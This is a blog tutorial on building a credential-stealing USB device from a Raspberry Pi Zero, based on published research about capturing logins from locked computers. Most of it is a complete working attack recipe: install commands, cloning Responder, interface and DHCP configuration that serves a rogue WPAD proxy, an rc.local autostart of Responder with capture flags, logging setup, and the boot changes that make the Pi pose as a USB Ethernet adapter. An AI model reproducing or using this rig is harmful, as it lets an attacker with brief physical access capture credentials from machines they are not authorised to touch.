Snagging Creds from locked machines - with a Raspberry pi zero

So this weeks been quite exciting on the exploit front, and this one grabbed my attention straight away

Rob Fuller aka "Mubix" released the results of some of his latest research, stealing credentials from a locked machine with a Hak5 Lan turtle or a device known as the USB Armory - see his article here

Now I have the Lan Turtle from hak5, but the instructions given ( in my opinion) missed a step. I have no doubt the issues will be fixed soon

He explains the concept by this:

If I plug in a device that masquerades as a USB Ethernet adapter and has a computer on the other end, can I capture credentials from a system, even when locked out (yes, logged in, just locked)

and says

this is dead simple and shouldn’t work, but it does

now if you look at the install instructions for the Armory below,

apt-get install -y python git python-pip python-dev screen sqlite3
pip install pycrypto
git clone https://github.com/spiderlabs/responder

This got me thinking, maybe we can use the raspberry pi zero to do the same job. Turns out we can. (also turns out I'm not the only one to think this way and the comments are littered with people looking to use Pi's)

I'm assuming you have installed your raspberry pi, I usually have a few kicking about and i'm not going to cover how to do that, this is the internet, go find it. Please ensure that you are running a version of Raspbian released after May 2016

Lets begin by installing what we need

sudo pip install pycrypto
sudo su
cd ~/
git clone https://github.com/spiderlabs/responder

EDIT /ETC/NETWORK/INTERFACES

Open /etc/network/interfaces with your favorite text editor, I use nano for this stuff and add the following to it:

auto usb0
allow-hotplug usb0
iface usb0 inet static
address 192.168.2.201
netmask 255.255.255.0
gateway 192.168.2.1

CONFIGURE DHCPD SETTINGS: /ETC/DHCP/DHCPD.CONF

Edit /etc/dhcp/dhcpd.conf and replace the contents with the text below:

ddns-update-style none;
option domain-name "domain.local";
option domain-name-servers 192.168.2.201;
default-lease-time 60;
max-lease-time 72;
# If this DHCP server is the official DHCP server for the local
# network, the authoritative directive should be uncommented.
authoritative;
# Use this to send dhcp log messages to a different log file (you also
# have to hack syslog.conf to complete the redirection).
log-facility local7;
# wpad
option local-proxy-config code 252 = text;
# A slightly different configuration for an internal subnet.
subnet 192.168.2.0 netmask 255.255.255.0 {
range 192.168.2.1 192.168.2.2;
option routers 192.168.2.201;
option local-proxy-config "http://192.168.2.201/wpad.dat";
}

EDIT /ETC/RC.LOCAL

Edit /etc/rc.local and add the following before exit 0:

# Clear leases
rm -f /var/lib/dhcp/dhcpd.leases
touch /var/lib/dhcp/dhcpd.leases
# Start DHCP server
/usr/sbin/dhcpd
# Start Responder
/usr/bin/screen -dmS responder bash -c 'cd /root/responder/; python Responder.py -I usb0 -f -w -r -d -F'

CREATE THE CONFIGURATION FILE FOR SCREEN

sudo su; nano ~/.screenrc and add this:
# Logging
deflog on
logfile /root/logs/screenlog_$USER_.%H.%n.%Y%m%d-%0c:%s.%t.log

Now, heres the thing, the OTG USB port on the pi zero is really designed to run as a host controller, but in our case we are trying to attach this to a laptop or a PC / Mac, so we need to change the behaviour of the USB port on the Pi by turning it into a virtual ethernet port. This is fairly easy to do:

  • shutdown the Pi Zero (shutdown -h now)
  • remove the Micro SD Card from the Pi.
  • Connect the Micro SD card to your computer.
  • We will need to modify config.txt and cmdline.txt to turn the OTG port to a virtual Ethernet port.

EDIT CONFIG.TXT

Add this after the last line:
dtoverlay=dwc2

EDIT CMDLINE.TXT

After rootwait (the last word on the first line) add a space and then
modules-load=dwc2,g_ether

Thats almost us.

  • Safely eject the Micro SD Card.
  • Put it back in the Pi Zero.
  • The device is ready use the USB OTG cable to connect it to the PC. Happy (responsible) Hacking !